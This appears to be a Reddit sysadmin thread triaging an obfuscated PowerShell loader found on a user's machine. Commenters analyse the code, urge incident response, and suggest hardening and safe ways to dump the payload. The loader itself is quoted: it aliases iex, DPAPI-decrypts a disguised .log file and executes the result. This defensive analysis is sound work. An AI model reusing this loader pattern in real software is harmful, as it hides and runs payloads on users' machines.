Odd Powershell script running on a user's machine, thoughts?

[-]

mitharas@reddit

I uploaded that script into virustotal to see what it reports: https://www.virustotal.com/gui/file/d0a1ace11341db5211d96721d2ea2e25a2722c1b660e649a1e02bf6644130aa7?nocache=1

I feel like there should be more heuristic recognitions, since this is 100% malicious code.

[-]

I’ve noticed that appdata folders are a tough place to regulate with hard set rules, like “no .ps1 files ran here” or “no portable.exe”, because legitimate processes are running there and would get blocked. A lot of the processes are actually Microsoft. It would not surprise me at all that bad guys would hide stuff there. It most likely will fly under the radar as everything there is setup like a temp file

[-]

sparkyflashy@reddit

Microsoft AppLocker does a really good job of blocking executables in user directories.

[-]

grygrx@reddit

If starting new look also look at WDAC. Recommended by Microsoft over applocker, a bit harder to start up, but easier to stack rules, and a tighter overall security model than applocker.

[-]

skipITjob@reddit

Does it require any licence?

[-]

BlackV@reddit

its executing what ever code is in $ixwbfsckol

but its obviously bad/suspect, nothing suggests a legitimate program left this behind, wipe the machine and start again

you say a user called you, so

is this a corporate environment ?
where did this come from ?
have you checked how wide spread ?
does the user have admin rights ?

you might have bigger problems

[-]

ladder_filter@reddit (OP)

agreed.

what concerns me is that ms defender didn't even blink. I've got to find a better A/V solution that will catch things like this.

[-]

BlankDragon294@reddit

MS defender is a joke of an antivirus, most know how to bypass it. Hopefully you have another better antivirus.

[-]

skipITjob@reddit

Windows defender is. Microsoft defender, configured, is really good.

[-]

skipITjob@reddit

Do you have Microsoft Defender for Endpoint enabled and configured or is it just Windows Defender?

https://www.microsoft.com/en-us/security/business/endpoint-security/microsoft-defender-endpoint

[-]

snarlywino@reddit

That should not be your first concern.

[-]

IID10TError@reddit

Best thing you can do right now is push out a GPO to make Powershell Execution Policy to AllSigned (Script would have to be signed by an internal entity before it can be ran).

Second, if any of your users have local admin, revoke it, make them standard users.

[-]

goldmikeygold@reddit

You need application whitelisting.

[-]

disclosure5@reddit

This is the worst possible solution. You don't replace an entire product line because one single script ran.

Upload it to virustotal. Odds are that script is clean according to whatever alternative you were looking at.

[-]

goshin2568@reddit

Idk how much time you spend looking at malicious powershell scripts but I do it reasonably often and I'm 99.9% this is malware. If it isn't, someone is very specifically going out of their way to make it look like malware. Those randomized variable names are a smoking gun.

It doesn't really matter, as it can be confirmed pretty easily by OP looking at the code it's pulling in, and I agree they should confirm before nuking everything, but this should absolutely be setting off alarm bells.

[-]

MBILC@reddit

If the script does not directly contain malicious code it will pass, it could also easily do a get to pull down malicious code at some point.

[-]

disclosure5@reddit

Yeah, it literally reads a file, decrypts it and executes it. There's plenty of reasons that could happen legitimately, the malware is in the encrypted file.

[-]

IntheNickofTime105@reddit

100% malicious behavior. The iex-command to load the payload into memory and then execute it has been obfuscated to evade AMSI/CLR/MDE. It seems to load a payload from Remove-PrinterPort.log, check that out for your next clue. It’s obfuscated (if you look at the variable names , however you can use DPAPI to decrypt it if that’s the case.

Either way, it’s might be time to call the IRT, you definitely have an incident on your hands.

[-]

GroundbreakingCrow80@reddit

Don't let other team members prevent you from sending emails to IT security leadership that you have an incident. Calling in help now could save your company money. Make sure the people who are looking at risk are in the know. Use email and print it to cover yourself.

When they decline hiring IRT they may look for scapegoats. There also could be lawsuits depending on your industry. Make sure you have your diligence documented.

[-]

BlackV@reddit

what other AV would catch this ?

you would have to go with some dedicated edr system (which defender cloud also supports)

these things don't happen in isolation, your user clicked on something somehow (outlook link, visited dodgy website), you don't know about that (lack of monitoring), you didn't restrict that (lack of firewall/thread protection), AV alone is not the solution here

[-]

Nexzus_@reddit

Each line of that code does have a legitimate use.

Aliasing a command. Decrypting a file. Running that code from the decrypted file.

And whatever put it there probably just randomizes the variable names.

[-]

visibleunderwater_-1@reddit

There are SEVERAL ongoing malware campaigns that use this EXACT style of attack. Assume you have a real, ongoing security incident RIGHT NOW.

"Each line of that code does have a legitimate use." that technique is called "living off the land", when attackers use already-installed tools. You need specific monitoring that is looking for entries like "[System.Security.Cryptography.ProtectedData]::Unprotect" and throws an alert to your sysadmins and security people. This code snippet could be VERY BAD:

It is using specific obfuscation techniques to pull specific raw bytes out of this "log file", then decrypts these bytes and runs them as a Powershell "stream". You need to dump the potential payload safely, then put THAT into Defender or even JoeSandbox/VirusTotal etc:

$bytes = [System.IO.File]::ReadAllBytes('C:\Users\dmpuser\AppData\Local\Microsoft\CLR_v4.0\Remove-PrinterPort.log')

$decoded = [System.Security.Cryptography.ProtectedData]::Unprotect($bytes, $null,[System.Security.Cryptography.DataProtectionScope]::LocalMachine)

[System.Text.Encoding]::UTF8.GetString($decoded) | Out-File "C:\temp\decrypted_payload.ps1"

Tool/Malware	Matching Technique	Notable Use
Cobalt Strike	`iex`Encrypted payload drop + loader	Common red team / APT tool
Empire	`iex`Obfuscated PowerShell + aliases for	Fileless attacks
Gootkit	Dropper using .log/.ini decoys	Banking trojan loader
PowerSploit	Invoke-Expression payloads from encoded files	Common in post-exploitation scripts
APT32	DPAPI + fake config files	Used in targeting SE Asia
APT29	Registry and file-based encrypted PS scripts	Cozy Bear / Russian state-sponsoredTool/Malware Matching Technique Notable UseCobalt Strike Encrypted payload drop + iex loader Common red team / APT toolEmpire Obfuscated PowerShell + aliases for iex Fileless attacksGootkit Dropper using .log/.ini decoys Banking trojan loaderPowerSploit Invoke-Expression payloads from encoded files Common in post-exploitation scriptsAPT32 DPAPI + fake config files Used in targeting SE AsiaAPT29 Registry and file-based encrypted PS scripts Cozy Bear / Russian state-sponsored

[-]

bjc1960@reddit

May of these don't need admin rights too.

I wonder if it is clickfix or file fix - see https://www.youtube.com/watch?v=Vz2ak0YW_L4 andhttps://www.youtube.com/watch?v=lSa_wHW1pgQ

To the OP - if you get AutoElevate, it can block MSHTA.exe and other exes from running. Clickfix uses MSHTA I think.

SquareX can block copying of system commands from the browser such as powershell.exe -eq bypass, etc.

[-]

pjs_cyber@reddit

Check the runMRU in the registry if you think it was ran in the run dialog box.

I wrote and article on how to hunt for it: https://pjstaley.com/abuse-of-the-run-dialog-tactics-detection-and-hunting/

[-]

Sovey_@reddit

Defender did hit on and block a ClickFix attempt for us.

[-]

bjc1960@reddit

Nice - thx for sharing that. This is a big concern for us.

[-]

Sobeman@reddit

I mean even crowd strike, cylance, sentinel1 miss shit. It's more important that you figure out what it does, where it originated from, and why defender didn't catch it. A lot of times the way your environment is configured allows for this stuff to happen at no fault of defender or whatever security suite that you are running.

[-]

gurilagarden@reddit

cryptography and printer ports was the first flag. They ain't got nothing to do with each other. Then the randomly named files being referenced. ixwbfsckol and qzksiw. Always red flags for bad actors.

You're either a heartbeat away from a ransomware attack, or something worse. Unplug the internet. Check your backups FIRST. make sure you've got a good hot copy of everything that matters, keep it safe and offline, then start your hunt. It's all hands on deck. It's not a drill.

[-]

Crowley723@reddit

I would do nothing and contact their soc or security consultant. What they do next could very well decide how severe any incident response will have to be.

[-]

KaleidoscopeLegal348@reddit

Lmao don't come to Reddit for this, go directly to your SOC/IR/mssp

[-]

Negative_Wonder_7647@reddit

You block users from using cmd and power shell. All power shell…… then no worries.

[-]

MatazaNz@reddit

This looks like a very common malicious script. They often use garbage names and aliases to try and fool endpoint protection.

It's reading from another file and executing it, from the brief glance.

[-]

ceddshot@reddit

!updateme 2 days

[-]

nmj95123@reddit

Absolutely malicious. Looks like it decrypts the Remove-PrinterPort.log file, then passes the contents to execute.

[-]

martinfendertaylor@reddit

Just wanna add that I've seen ninjarmm and a third party tool ninja uses for software deployment do weird things like this. The dmpuser account is definitely suspect though. Any other IOCs? Who is this device talking to?

[-]

Remarkable-Onion9253@reddit

!updateme 1 day

[-]

hobovalentine@reddit

You should look into pushing a policy that only allows signed PS scripts to run, or require admin rights to run powershell so that users don't just inadvertently run a malicious powershell script.

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_signing?view=powershell-7.5

[-]

kenzonh@reddit

Install Huntress on the machine. It will find it and take it out.

[-]

TripsNZ@reddit

!updateme 1 day

[-]

Odd-Sun7447@reddit

That PowerShell script you posted reads an encrypted log file, decrypts its contents using the Windows Data Protection API (DPAPI), and then executes the decrypted data as code.

Here's what each part does in plain terms:

Add-Type -AssemblyName System.Security: Loads the security-related .NET classes so they can be used in the script.
set-alias ikzjoqv "iex": Creates a shortcut (ikzjoqv) for iex, which is short for Invoke-Expression. That command runs any string as if it were a command.
ReadAllBytes(...): Loads the contents of the file Remove-PrinterPort.log as raw binary data.
ProtectedData::Unprotect(...): Decrypts that binary data using DPAPI under the machine context.
GetString(...): Converts the decrypted bytes into a readable string.
Invoke-Expression(...): Finally, executes the decrypted string as PowerShell code.

🛑 Important note: This kind of pattern—loading encrypted data from a file, decrypting it, and then running it—is a classic method used in obfuscated or hidden scripts, often for malicious purposes like malware. If you're examining this code for learning or auditing purposes, it's best to do so in a secure, isolated environment.

Want to explore what that decrypted data might do—safely and hypothetically? Or are you analyzing this for security training?

[-]

Dry_Inspection_4583@reddit

My bet is the user clicked something, AI indicates this would have been working to encrypt all their files. Quarantine and take a look, or check your logs if you have a forward proxy.

[-]

Borne2Run@reddit

Looks like a dropper that is decrypting whatever is sent to it; AI is a tool but often very very wrong.

[-]

Dry_Inspection_4583@reddit

I'm a tool that sometimes gets things right. Appreciate the feedback, I have to actively look up all the things PowerShell

[-]

nerfblasters@reddit

There is nowhere near enough information to determine what this malware does. The only thing we know is that this script loads the contents of that .log file into memory and executes it.

And that it's bad, because there is zero reason for anything legitimate to be obfuscated like this. Time to roll IR.

[-]

g13005@reddit

This process is Invoking an expression from the decrypted on-the-fly contents of the following file:
"C:\Users\dmpuser\AppData\Local\Microsoft\CLR_v4.0\Remove-PrinterPort.log"

The file was encrypted using the Localmachine, this allows the attacker to store encrypted payloads on disk to avoid detection.

[-]

Gold-Antelope-4078@reddit

RIP OP. :(

[-]

pee_shudder@reddit

This looks like passive encryption to me. So Ransomware attempt or she has Bitlocker encryption enabled in windows. I would see if bitlocker is enabled then disable it and wait for it to decrypt then see if the problem with that process consuming resources goes away only because it is a simple, clear test. Just perform it with all network adapters disabled.

The real answer is the one you have been given by others here; the machine needs to be wiped it has lost the 100% sanctity necessary for a vote of confidence from any worthy IT department.

[-]

nerfblasters@reddit

!updateme 1 day

This is 100% malware OP. If you post the contents of that .log file someone in here can likely help you figure out what the next steps of it were.

However bare minimum you need to assume any credentials on that endpoint are compromised. If the user had any passwords saved in the browser they need to be changed immediately.

All sessions for all services need to be revoked as well. Start with the big ones like Entra/Gsuite, but really you should go through and make sure that every site that has a cookie saved gets all session tokens revoked, or at least the "sign out" button hit.

If you have an MSP/MSP that you work with or a cyber insurance policy, inquire with them about what your incident response procedure needs to be.

Isolate that host from the network and internet immediately. Don't turn it off until you speak to IR - they will likely want to run forensic tools and the current volatile memory has a wealth of useful information for determining scope of impact.

[-]

Justsomedudeonthenet@reddit

That's definitely worth looking into.

What are the contents of the file?

[-]

ladder_filter@reddit (OP)

WHY DIDN'T I THINK TO CHECK THIS

brb.

[-]

deeradmin@reddit

I'd be super curious to see what the file contains, are you able to upload it somewhere?

[-]

ladder_filter@reddit (OP)

see edit to the main post, looks NOT GOOD

[-]

BlackV@reddit

p.s. thanks for updating the formatting

[-]

Justsomedudeonthenet@reddit

Yeah, that's definitely some virus looking obfuscated code. Is there a Remove-PrinterPort.log file still there, and if so what does it have in it?

I'd assume the machine is compromised and act accordingly.

[-]

ladder_filter@reddit (OP)

Yup, on it. Thank you for reminding me to actually look at the file!

[-]

visibleunderwater_-1@reddit

decrypt it, then submit it to Virustotal...

$bytes = [System.IO.File]::ReadAllBytes('C:\Users\dmpuser\AppData\Local\Microsoft\CLR_v4.0\Remove-PrinterPort.log')

$decoded = [System.Security.Cryptography.ProtectedData]::Unprotect($bytes, $null,[System.Security.Cryptography.DataProtectionScope]::LocalMachine)

[System.Text.Encoding]::UTF8.GetString($decoded) | Out-File "C:\temp\decrypted_payload.ps1"

[-]

Disturbed_Bard@reddit

What's in that decrypted payload file?

Is there one?

[-]

Nexzus_@reddit

I'm wondering how it got there. I don't know much about the encryption stuff in .NET, but it looks like Remove-printerport.log may have had to be encrypted on the same machine. You might want to look for that script and vector.

[-]

imahe@reddit

You are correct, "Remove-printerport.log" can only be encrypted on that machine. $ixwbfsckol should hold the decrypted content of that file, I would guess some Powershell code which downloads annd executes more stuff.

[-]

disclosure5@reddit

Change the bottom line to write-output ([System.Text.Encoding]::UTF8.GetString($ixwbfsckol)) and run it. You'll get to see what it actually runs.

[-]

Sushi-And-The-Beast@reddit

Companies really need to start pushing for adblock on-prem.

[-]

VexingRaven@reddit

This is a wild leap.

[-]

BlackV@reddit

p.s. formatting (you've used inline code, not a code block)

open your fav powershell editor
highlight the code you want to copy
hit tab to indent it all
copy it
paste here

it'll format it properly OR

<BLANK LINE>
<4 SPACES><CODE LINE>
<4 SPACES><CODE LINE>
    <4 SPACES><4 SPACES><CODE LINE>
<4 SPACES><CODE LINE>
<BLANK LINE>

Inline code block using backticks `Single code line` inside normal text

See here for more detail

Thanks

[-]

artekau@reddit

RemindMe! -1 day

[-]

cspotme2@reddit

You need to extract (decrypt) the payload on that system from the log file mentioned. Dump the whole ps script into chatgpt and it'll decode it for you.

Powershell should have been disabled for your users by default at this point per company policy. Windows sucks in that regard. Defender edr might have picked up something depending on the payload.

[-]

Add-Type -AssemblyName System.Security

just loads the system.security assembly to the file can be decrypted

set-alias ikzjoqv "iex"

This portion is making "ikzjoqv" an alias for invoke-expression to obfuscate running commands

$qzksiw = [System.IO.File]::ReadAllBytes('C:\Users\dmpuser\AppData\Local\Microsoft\CLR_v4.0\Remove-PrinterPort.log');
$ixwbfsckol = [System.Security.Cryptography.ProtectedData]::Unprotect($qzksiw, $null, [System.Security.Cryptography.DataProtectionScope]::Localmachine)

Decrypted the contents of the .log file. This file is what contains the likely malicious code

ikzjoqv ([System.Text.Encoding]::UTF8.GetString($ixwbfsckol))

This takes the decrypted contents of the file and executes it with invoke-expression.

I would immediately isolate this device and setup a scan for these files on other devices.

You can find the contents of the file by running

$qzksiw = [System.IO.File]::ReadAllBytes('C:\Users\dmpuser\AppData\Local\Microsoft\CLR_v4.0\Remove-PrinterPort.log'); $ixwbfsckol = [System.Security.Cryptography.ProtectedData]::Unprotect($qzksiw, $null, [System.Security.Cryptography.DataProtectionScope]::Localmachine) $ixwbfsckol